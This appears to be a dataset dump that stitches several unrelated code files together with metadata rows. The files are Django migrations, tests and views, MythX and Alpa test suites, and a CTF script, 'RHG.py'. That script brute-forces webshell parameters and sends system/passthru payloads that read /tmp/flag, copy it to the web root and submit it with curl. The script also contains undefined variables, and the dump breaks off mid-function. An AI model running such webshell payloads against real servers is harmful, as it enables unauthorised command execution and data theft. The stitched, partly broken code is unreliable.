        migrations.AlterField(
            model_name='whatwearedoingdetail',
            name='whatDoDetail_desc5',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='whatwearedoingdetail',
            name='whatDoDetail_desc6',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='whatwearedoingdetail',
            name='whatDoDetail_desc7',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='whatwearedoingdetail',
            name='whatDoDetail_icon_name',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='whatwearedoingdetail',
            name='whatDoDetail_name',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='whoweare',
            name='WhoWeAre_desc1',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='whoweare',
            name='WhoWeAre_desc2',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='whoweare',
            name='WhoWeAre_desc3',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='whoweare',
            name='WhoWeAre_desc4',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='whoweare',
            name='WhoWeAre_desc5',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='whoweare',
            name='WhoWeAre_desc6',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='whoweare',
            name='WhoWeAre_desc7',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
    ]
| 40.027907 | 283 | 0.582733 | 829 | 8,606 | 5.892642 | 0.12304 | 0.163767 | 0.204708 | 0.237462 | 0.875537 | 0.875537 | 0.867349 | 0.858342 | 0.832753 | 0.831934 | 0 | 0.02908 | 0.288752 | 8,606 | 214 | 284 | 40.214953 | 0.768992 | 0.005229 | 0 | 0.75 | 1 | 0 | 0.139502 | 0.017058 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.009615 | 0 | 0.024038 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
8b14ff4209de9aec609709eb65fd8c7bc8474f99 | 6,545 | py | Python | kobra/api/v1/tests/test_discount_registrations.py | karservice/kobra | 2019fd3be499c06d2527e80576fd6ff03d8fe151 | [
"MIT"
] | 4 | 2016-08-28T16:00:20.000Z | 2018-01-31T18:22:43.000Z | kobra/api/v1/tests/test_discount_registrations.py | karservice/kobra | 2019fd3be499c06d2527e80576fd6ff03d8fe151 | [
"MIT"
] | 25 | 2016-08-15T20:57:59.000Z | 2022-02-10T18:14:48.000Z | kobra/api/v1/tests/test_discount_registrations.py | karservice/kobra | 2019fd3be499c06d2527e80576fd6ff03d8fe151 | [
"MIT"
] | 1 | 2017-02-06T17:13:16.000Z | 2017-02-06T17:13:16.000Z | # -*- coding: utf-8 -*-
from rest_framework import status
from rest_framework.reverse import reverse
from rest_framework.test import APITestCase
from ....factories import (DiscountFactory, DiscountRegistrationFactory,
StudentFactory, UnionFactory, UserFactory)
class DiscountRegistrationApiTests(APITestCase):
def test_list_unauthenticated(self):
url = reverse('v1:discountregistration-list')
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_list_authenticated(self):
url = reverse('v1:discountregistration-list')
user = UserFactory()
self.client.force_authenticate(user)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data, [])
def test_list_authenticated_unowned(self):
url = reverse('v1:discountregistration-list')
user = UserFactory()
# Creates a DiscountRegistration owned by someone else
DiscountRegistrationFactory()
self.client.force_authenticate(user)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data, [])
def test_list_authenticated_owned(self):
url = reverse('v1:discountregistration-list')
user = UserFactory()
owned_discount_registration = DiscountRegistrationFactory()
owned_discount_registration.discount.ticket_type.event.organization.admins\
.add(user)
# Creates a DiscountRegistration owned by someone else
DiscountRegistrationFactory()
self.client.force_authenticate(user)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), 1)
self.assertEqual(response.data[0]['id'], str(owned_discount_registration.id))
def test_create_unauthenticated(self):
url = reverse('v1:discountregistration-list')
union = UnionFactory()
discount = DiscountFactory(union=union)
student = StudentFactory(union=union)
request_data = {
'discount': reverse(
'v1:discount-detail',
kwargs={'pk': discount.pk}),
'student': reverse(
'v1:student-detail',
kwargs={'pk': student.pk})
}
response = self.client.post(url, data=request_data)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_create_authenticated_unowned_discount(self):
url = reverse('v1:discountregistration-list')
user = UserFactory()
union = UnionFactory()
discount = DiscountFactory(union=union)
student = StudentFactory(union=union)
request_data = {
'discount': reverse(
'v1:discount-detail',
kwargs={'pk': discount.pk}),
'student': reverse(
'v1:student-detail',
kwargs={'pk': student.pk})
}
self.client.force_authenticate(user)
response = self.client.post(url, data=request_data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_authenticated_owned_discount(self):
url = reverse('v1:discountregistration-list')
user = UserFactory()
union = UnionFactory()
discount = DiscountFactory(union=union)
discount.ticket_type.event.organization.admins.add(user)
student = StudentFactory(union=union)
request_data = {
'discount': reverse(
'v1:discount-detail',
kwargs={'pk': discount.pk}),
'student': reverse(
'v1:student-detail',
kwargs={'pk': student.pk})
}
self.client.force_authenticate(user)
response = self.client.post(url, data=request_data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_create_authenticated_mismatching_union(self):
url = reverse('v1:discountregistration-list')
user = UserFactory()
discount_union = UnionFactory()
student_union = UnionFactory()
discount = DiscountFactory(union=discount_union)
discount.ticket_type.event.organization.admins.add(user)
student = StudentFactory(union=student_union)
request_data = {
'discount': reverse(
'v1:discount-detail',
kwargs={'pk': discount.pk}),
'student': reverse(
'v1:student-detail',
kwargs={'pk': student.pk})
}
self.client.force_authenticate(user)
response = self.client.post(url, data=request_data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_unauthenticated(self):
discount_registration = DiscountRegistrationFactory()
url = reverse('v1:discountregistration-detail',
kwargs={'pk': discount_registration.pk})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_retrieve_authenticated_unowned(self):
user = UserFactory()
discount_registration = DiscountRegistrationFactory()
url = reverse('v1:discountregistration-detail',
kwargs={'pk': discount_registration.pk})
self.client.force_authenticate(user)
response = self.client.get(url)
# Authenticated requests should be treated as 404 when retrieving an
# unowned discount registration
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
def test_retrieve_authenticated_owned(self):
user = UserFactory()
discount_registration = DiscountRegistrationFactory()
discount_registration.discount.ticket_type.event.organization.admins \
.add(user)
url = reverse('v1:discountregistration-detail',
kwargs={'pk': discount_registration.pk})
self.client.force_authenticate(user)
response = self.client.get(url)
        # Admins of the owning organization should be able to retrieve
        # the discount registration
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['id'], str(discount_registration.id))
| 38.274854 | 85 | 0.653629 | 643 | 6,545 | 6.48367 | 0.133748 | 0.041017 | 0.082754 | 0.084433 | 0.828016 | 0.817222 | 0.796834 | 0.770449 | 0.717678 | 0.717678 | 0 | 0.012396 | 0.248128 | 6,545 | 170 | 86 | 38.5 | 0.83479 | 0.049045 | 0 | 0.748092 | 0 | 0 | 0.086887 | 0.050523 | 0 | 0 | 0 | 0 | 0.122137 | 1 | 0.083969 | false | 0 | 0.030534 | 0 | 0.122137 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8b4599387b157c1baa8108e647b8104e91c4b15c | 991 | py | Python | pubsub/testSimulate.py | moonyouj889/building_energy_consumption | 1ee4df03dcd5303788bba43ce4370567de6d5d5f | [
"Apache-2.0"
] | null | null | null | pubsub/testSimulate.py | moonyouj889/building_energy_consumption | 1ee4df03dcd5303788bba43ce4370567de6d5d5f | [
"Apache-2.0"
] | null | null | null | pubsub/testSimulate.py | moonyouj889/building_energy_consumption | 1ee4df03dcd5303788bba43ce4370567de6d5d5f | [
"Apache-2.0"
] | null | null | null | from send_meter_data import splitRow
# print(splitRow('2017-03-31T20:00:00-04:00,6443.0,1941.0,40.0,5397.0,2590.0',
# 'timestamp,1_Gen,1_Sub_1,1_Sub_3,2_Gen,2_Sub_1'))
assert(splitRow('2017-03-31T20:00:00-04:00,6443.0,1941.0,40.0,5397.0,2590.0',
'timestamp,Gen,Sub_1,Sub_3,Gen,Sub_1') ==
['2017-03-31T20:00:00-04:00,1,6443.0,1941.0,40.0',
'2017-03-31T20:00:00-04:00,2,5397.0,2590.0'])
print("Test1 Passed!")
# print(splitRow('2017-03-31T20:00:00-04:00,6443.0,1941.0,40.0,5397.0,2590.0,0.0',
# 'timestamp,1_Gen,1_Sub_1,1_Sub_3,2_Gen,2_Sub_1,3_Gen'))
assert(splitRow('2017-03-31T20:00:00-04:00,6443.0,1941.0,40.0,5397.0,2590.0,0.0',
'timestamp,Gen,Sub_1,Sub_3,Gen,Sub_1,Gen') ==
['2017-03-31T20:00:00-04:00,1,6443.0,1941.0,40.0',
'2017-03-31T20:00:00-04:00,2,5397.0,2590.0',
'2017-03-31T20:00:00-04:00,3,0.0'])
print("Test2 Passed!") | 58.294118 | 83 | 0.592331 | 203 | 991 | 2.768473 | 0.137931 | 0.096085 | 0.176157 | 0.208185 | 0.870107 | 0.870107 | 0.870107 | 0.870107 | 0.836299 | 0.836299 | 0 | 0.417391 | 0.187689 | 991 | 17 | 84 | 58.294118 | 0.280745 | 0.299697 | 0 | 0.166667 | 0 | 0.5 | 0.615942 | 0.578261 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0 | true | 0.166667 | 0.083333 | 0 | 0.083333 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 14 |
8cea114f04cc6617f4c2f711f21495d28e272c7f | 2,615 | py | Python | CTF/RHG WEB/RHG.py | iriszero48/Trash | f93c7f36eb860ae15e5c95db6d1d28ede10698c2 | [
"MIT"
] | null | null | null | CTF/RHG WEB/RHG.py | iriszero48/Trash | f93c7f36eb860ae15e5c95db6d1d28ede10698c2 | [
"MIT"
] | null | null | null | CTF/RHG WEB/RHG.py | iriszero48/Trash | f93c7f36eb860ae15e5c95db6d1d28ede10698c2 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import requests
import sys
import re
import os
import api
from functools import *
#scan = lambda url:[url + i for i in open("word.txt","r").read().split('\n') if requests.get(url+i).status_code == 200][0]
FuckShellPost = lambda url: [url + i for i in open("word.txt","r").read().split("\n") if "hackbyatd" in requests.post(url=(url + i), data={i:"echo hackbyatd;"}).text]
def GetFlagPost(url):
try:
return re.findall("flag\{([^}]*)\}",requests.post(url=url, data={i:"passthru(\"echo `cat /tmp/flag`\");"}).text)
except Exception as e:
try:
return re.findall("flag\{([^}]*)\}",requests.post(url=url, data={i:"system(\"echo `cat /tmp/flag`\");"}).text)
except Exception as e:
try:
return re.findall("flag\{([^}]*)\}",requests.post(url=url, data={i:'system("cp /tmp/flag /var/www/html/flag1");system("echo `cat /tmp/flag`"); '}).text)
except Exception as e:
try:
return re.findall("flag\{([^}]*)\}",requests.post(url=url, data={i:'passthru("cp /tmp/flag /var/www/html/flag1");system("echo `cat /tmp/flag`"); '}).text)
except Exception as e:
return []
FuckShellGet = lambda url: [url + i for i in open("word.txt","r").read().split("\n") if "hackbyatd" in requests.get(url=(url + i), data={i:"echo hackbyatd;"}).text]
def GetFlagGet(url):
try:
return re.findall("flag\{([^}]*)\}",requests.get(url=url, data={i:"passthru(\"cat /tmp/flag\");"}).text)[0]
except Exception as e:
try:
return re.findall("flag\{([^}]*)\}",requests.get(url=url, data={i:"system(\"cat /tmp/flag\");"}).text)[0]
except Exception as e:
try:
return re.findall("flag\{([^}]*)\}",requests.get(url=url, data={i:'system("cp /tmp/flag /var/www/html/flag1");system("cat flag1"); '}).text)[0]
except Exception as e:
try:
return re.findall("flag\{([^}]*)\}",requests.get(url=url, data={i:'passthru("cp /tmp/flag /var/www/html/flag1");system("cat flag1"); '}).text)[0]
except Exception as e:
return []
[os.system('curl -k -d "answer="' + f + ' -X POST -v --user ' + USER + ':' + PWD + ' https://ip/api/sub_answer') for u in FuckShellPost("http://" + sys.argv[1]) for f in GetFlagPost(u)]
[os.system('curl -k -d "answer="' + f + ' -X POST -v --user ' + USER + ':' + PWD + ' https://ip/api/sub_answer') for u in FuckShellGet("http://" + sys.argv[1]) for f in GetFlagGet(u)]
| 53.367347 | 198 | 0.5587 | 374 | 2,615 | 3.898396 | 0.197861 | 0.053498 | 0.060357 | 0.098765 | 0.845679 | 0.837449 | 0.837449 | 0.833333 | 0.833333 | 0.789438 | 0 | 0.008273 | 0.214149 | 2,615 | 48 | 199 | 54.479167 | 0.701217 | 0.054302 | 0 | 0.512821 | 0 | 0.102564 | 0.268016 | 0.054251 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051282 | false | 0.102564 | 0.179487 | 0 | 0.487179 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
50ac13cd434a6d7a968f0f0025250ae516a5e4e1 | 18 | py | Python | student_num.py | starking999/sample_60195163 | 1126b7e608135bf245617f78f14f1237ec37b661 | [
"MIT"
] | null | null | null | student_num.py | starking999/sample_60195163 | 1126b7e608135bf245617f78f14f1237ec37b661 | [
"MIT"
] | null | null | null | student_num.py | starking999/sample_60195163 | 1126b7e608135bf245617f78f14f1237ec37b661 | [
"MIT"
] | null | null | null | print("60195163")
| 9 | 17 | 0.722222 | 2 | 18 | 6.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.470588 | 0.055556 | 18 | 1 | 18 | 18 | 0.294118 | 0 | 0 | 0 | 0 | 0 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
0fcf6fe039de116f2d8d733fba6b871883591faa | 8,740 | py | Python | tests/test_report.py | Player1-PlaySwap/mythx-cli | defc59e2a8732a6e2e550ac62ded5a46c32a780b | [
"MIT"
] | 58 | 2019-09-13T13:42:33.000Z | 2022-03-28T11:37:54.000Z | tests/test_report.py | Player1-PlaySwap/mythx-cli | defc59e2a8732a6e2e550ac62ded5a46c32a780b | [
"MIT"
] | 48 | 2019-09-17T19:28:55.000Z | 2022-03-18T03:28:48.000Z | tests/test_report.py | Player1-PlaySwap/mythx-cli | defc59e2a8732a6e2e550ac62ded5a46c32a780b | [
"MIT"
] | 17 | 2019-09-17T06:49:38.000Z | 2022-03-02T19:24:00.000Z | import json
from click.testing import CliRunner
from mythx_models.response import AnalysisInputResponse, DetectedIssuesResponse
from mythx_cli.cli import cli
from .common import get_test_case, mock_context
INPUT_RESPONSE = get_test_case(
"testdata/analysis-input-response.json", AnalysisInputResponse
)
ISSUES_RESPONSE = get_test_case(
"testdata/detected-issues-response.json", DetectedIssuesResponse
)
ISSUES_SIMPLE = get_test_case("testdata/detected-issues-simple.txt", raw=True)
ISSUES_TABLE = get_test_case("testdata/detected-issues-table.txt", raw=True)
def test_report_tabular():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli, ["analysis", "report", "ab9092f7-54d0-480f-9b63-1bb1508280e2"]
)
assert result.output == ISSUES_TABLE
assert result.exit_code == 0
def test_report_tabular_blacklist():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"analysis",
"report",
"--swc-blacklist",
"SWC-110",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert "Assert Violation" not in result.output
assert (
"/home/spoons/diligence/mythx-qa/land/contracts/estate/EstateStorage.sol"
not in result.output
)
assert result.exit_code == 0
def test_report_tabular_whitelist():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"analysis",
"report",
"--swc-whitelist",
"SWC-110",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert "Assert Violation" in result.output
assert (
"/home/spoons/diligence/mythx-qa/land/contracts/estate/EstateStorage.sol"
in result.output
)
assert result.exit_code == 0
def test_report_tabular_filter():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"analysis",
"report",
"--min-severity",
"high",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert "Assert Violation" not in result.output
assert (
"/home/spoons/diligence/mythx-qa/land/contracts/estate/EstateStorage.sol"
not in result.output
)
assert result.exit_code == 0
def test_report_json():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"json",
"analysis",
"report",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert json.loads(result.output)[0] == json.loads(ISSUES_RESPONSE.to_json())
assert result.exit_code == 0
def test_report_json_blacklist():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"json",
"analysis",
"report",
"--swc-blacklist",
"SWC-110",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert all(
x["swcID"] != "SWC-110" for x in json.loads(result.output)[0][0]["issues"]
)
assert result.exit_code == 0
def test_report_json_whitelist():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"json",
"analysis",
"report",
"--swc-whitelist",
"SWC-110",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert all(
x["swcID"] == "SWC-110" for x in json.loads(result.output)[0][0]["issues"]
)
assert result.exit_code == 0
def test_report_json_filter():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"json",
"analysis",
"report",
"--min-severity",
"high",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert all(
x["swcID"] != "SWC-110" for x in json.loads(result.output)[0][0]["issues"]
)
assert result.exit_code == 0
def test_report_json_pretty():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"json-pretty",
"analysis",
"report",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert json.loads(result.output)[0] == json.loads(ISSUES_RESPONSE.to_json())
assert result.exit_code == 0
def test_report_json_pretty_blacklist():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"json-pretty",
"analysis",
"report",
"--swc-blacklist",
"SWC-110",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert all(
x["swcID"] != "SWC-110" for x in json.loads(result.output)[0][0]["issues"]
)
assert result.exit_code == 0
def test_report_json_pretty_whitelist():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"json-pretty",
"analysis",
"report",
"--swc-whitelist",
"SWC-110",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert all(
x["swcID"] == "SWC-110" for x in json.loads(result.output)[0][0]["issues"]
)
assert result.exit_code == 0
def test_report_json_pretty_filter():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"json-pretty",
"analysis",
"report",
"--min-severity",
"high",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert all(
x["swcID"] != "SWC-110" for x in json.loads(result.output)[0][0]["issues"]
)
assert result.exit_code == 0
def test_report_simple():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"simple",
"analysis",
"report",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert result.output == ISSUES_SIMPLE
assert result.exit_code == 0
def test_report_simple_blacklist():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"simple",
"analysis",
"report",
"--swc-blacklist",
"SWC-110",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert "Assert Violation" not in result.output
assert result.exit_code == 0
def test_report_simple_whitelist():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"simple",
"analysis",
"report",
"--swc-whitelist",
"SWC-110",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert "Assert Violation" in result.output
assert result.exit_code == 0
def test_report_simple_filter():
runner = CliRunner()
with mock_context():
result = runner.invoke(
cli,
[
"--format",
"simple",
"analysis",
"report",
"--min-severity",
"high",
"ab9092f7-54d0-480f-9b63-1bb1508280e2",
],
)
assert "SWC-110" not in result.output
assert result.exit_code == 0
| 25.705882 | 86 | 0.478719 | 776 | 8,740 | 5.259021 | 0.094072 | 0.055869 | 0.050968 | 0.090174 | 0.912521 | 0.903945 | 0.879686 | 0.879686 | 0.879686 | 0.848076 | 0 | 0.085029 | 0.40389 | 8,740 | 339 | 87 | 25.781711 | 0.698273 | 0 | 0 | 0.743056 | 0 | 0 | 0.203661 | 0.106751 | 0 | 0 | 0 | 0 | 0.121528 | 1 | 0.055556 | false | 0 | 0.017361 | 0 | 0.072917 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0ff850790a22246f8bef5fd06a5b8ef12a4ef96c | 3,955 | py | Python | tests/test_pipeline_reduce_scatter.py | yf225/alpa | a7b5f061537e260875c621a82e14265b1df64c5f | [
"Apache-2.0"
] | null | null | null | tests/test_pipeline_reduce_scatter.py | yf225/alpa | a7b5f061537e260875c621a82e14265b1df64c5f | [
"Apache-2.0"
] | null | null | null | tests/test_pipeline_reduce_scatter.py | yf225/alpa | a7b5f061537e260875c621a82e14265b1df64c5f | [
"Apache-2.0"
] | null | null | null | import unittest
from alpa.testing import PipelineBasicTest
from alpa.global_env import global_config
from alpa.util import count_communication_primitives
as_option = global_config.default_autosharding_option
class PipelineReduceScatterTest(PipelineBasicTest):
def test_mlp_grad_acc_friendly(self):
as_option.force_data_parallel = True
as_option.prefer_reduce_scatter = True
hlo_text = self.run_mlp(do_numerical_test=True)
# Check number of communication primitives
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[0],
ignore_scalar_all_reduce=True))
assert n_total == 0
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[1],
ignore_scalar_all_reduce=True))
assert n_total == 0
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[2],
ignore_scalar_all_reduce=True))
assert n_total == n_all_reduce == 1
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[3],
ignore_scalar_all_reduce=True))
assert n_total == n_all_reduce == 1
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[4],
ignore_scalar_all_reduce=True))
assert n_total == n_all_gather == 1
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[5],
ignore_scalar_all_reduce=True))
assert n_total == n_all_gather == 1
def test_bert_grad_acc_friendly(self):
as_option.force_data_parallel = True
as_option.prefer_reduce_scatter = True
hlo_text = self.run_n_layer_bert(n_layers=2, do_numerical_test=True)
# Check numbers of communication primitives
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[0],
ignore_scalar_all_reduce=True))
assert n_total == 0
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[1],
ignore_scalar_all_reduce=True))
assert n_total == 0
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[2],
ignore_scalar_all_reduce=True))
assert n_total == n_all_reduce == 1
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[3],
ignore_scalar_all_reduce=True))
assert n_total == n_all_reduce == 1
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[4],
ignore_scalar_all_reduce=True))
assert n_total == n_all_gather == 1
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_text[5],
ignore_scalar_all_reduce=True))
assert n_total == n_all_gather == 1
def suite():
suite = unittest.TestSuite()
suite.addTest(PipelineReduceScatterTest('test_mlp_grad_acc_friendly'))
suite.addTest(PipelineReduceScatterTest('test_bert_grad_acc_friendly'))
return suite
if __name__ == "__main__":
runner = unittest.TextTestRunner()
runner.run(suite())
| 41.631579 | 76 | 0.62579 | 470 | 3,955 | 4.731915 | 0.142553 | 0.057554 | 0.06295 | 0.089928 | 0.808453 | 0.759892 | 0.759892 | 0.759892 | 0.759892 | 0.759892 | 0 | 0.009117 | 0.3067 | 3,955 | 94 | 77 | 42.074468 | 0.801969 | 0.020733 | 0 | 0.742857 | 0 | 0 | 0.015762 | 0.013695 | 0 | 0 | 0 | 0 | 0.171429 | 1 | 0.042857 | false | 0 | 0.057143 | 0 | 0.128571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e83f6f9eaf9da7dc1eae7123914d4433daf584c7 | 4,043 | py | Python | mysite/ubibank/views.py | PUNITKUMARGAUTAM/mydjango | 5dd86a99bc0fae0cad712412d2de9c0c6cee6dcc | [
"MIT"
] | null | null | null | mysite/ubibank/views.py | PUNITKUMARGAUTAM/mydjango | 5dd86a99bc0fae0cad712412d2de9c0c6cee6dcc | [
"MIT"
] | null | null | null | mysite/ubibank/views.py | PUNITKUMARGAUTAM/mydjango | 5dd86a99bc0fae0cad712412d2de9c0c6cee6dcc | [
"MIT"
] | null | null | null | from django.http import HttpResponse
from django.shortcuts import render
from ubibank.models import Bank
# Create your views here.
def UBI(request):
Acno=""
Acname=""
Actype=""
Acbal=""
Acmbno=""
email=""
cmd=""
result=""
if request.GET:
Acno=request.GET["Acno"]
Acname=request.GET["Acname"]
Actype=request.GET["Actype"]
Acbal=request.GET["Acbal"]
Acmbno=request.GET["Acmbno"]
email=request.GET["email"]
ubibank=Bank(Acno=Acno,Acname=Acname,Actype=Actype,Acbal=Acbal,Acmbno=Acmbno,email=email)
ubibank.save()
        result="Inserted Successfully"
data={"result":result,"Acno":Acno,"Acname":Acname,"Actype":Actype,"Acbal":Acbal,"Acmbno":Acmbno,"email":email}
return render(request,"Home.html",{"data":data})
def withdrawl(request):
Acno=""
Acname=""
Actype=""
Acbal=""
Acmbno=""
email=""
cmd=""
result=""
if request.GET:
cmd=request.GET["command"]
if cmd=="search":
Acno=request.GET["Acno"]
ubibank=Bank.objects.filter(Acno=Acno)
if len(ubibank)==0:
result="no data found"
else:
Acno=ubibank[0].Acno
Acname=ubibank[0].Acname
Actype=ubibank[0].Actype
Acbal=ubibank[0].Acbal
Acmbno=ubibank[0].Acmbno
email=ubibank[0].email
ubibank[0].save()
                result="Search success"
data={"result":result,"Acno":Acno,"Acname":Acname,"Actype":Actype,"Acbal":Acbal,"Acmbno":Acmbno,"email":email}
return render(request,"withdrawl.html",{"data":data})
if cmd=="withdrawl":
Acno=request.GET["Acno"]
ubibank=Bank.objects.filter(Acno=Acno)
if len(ubibank)==0:
result="no data found"
else:
Acname=ubibank[0].Acname
Actype=ubibank[0].Actype
amount=int(request.GET["amount"])
ubibank[0].Acbal=str(int(ubibank[0].Acbal)-amount)
Acbal=ubibank[0].Acbal
Acmbno=ubibank[0].Acmbno
email=ubibank[0].email
ubibank[0].save()
                result="withdrawal success"
data={"result":result,"Acno":Acno,"Acname":Acname,"Actype":Actype,"Acbal":Acbal,"Acmbno":Acmbno,"email":email}
return render(request,"withdrawl.html",{"data":data})
def deposite(request):
Acno=""
Acname=""
Actype=""
Acbal=""
Acmbno=""
email=""
cmd=""
result=""
if request.GET:
cmd=request.GET["command"]
if cmd=="search":
Acno=request.GET["Acno"]
ubibank=Bank.objects.filter(Acno=Acno)
if len(ubibank)==0:
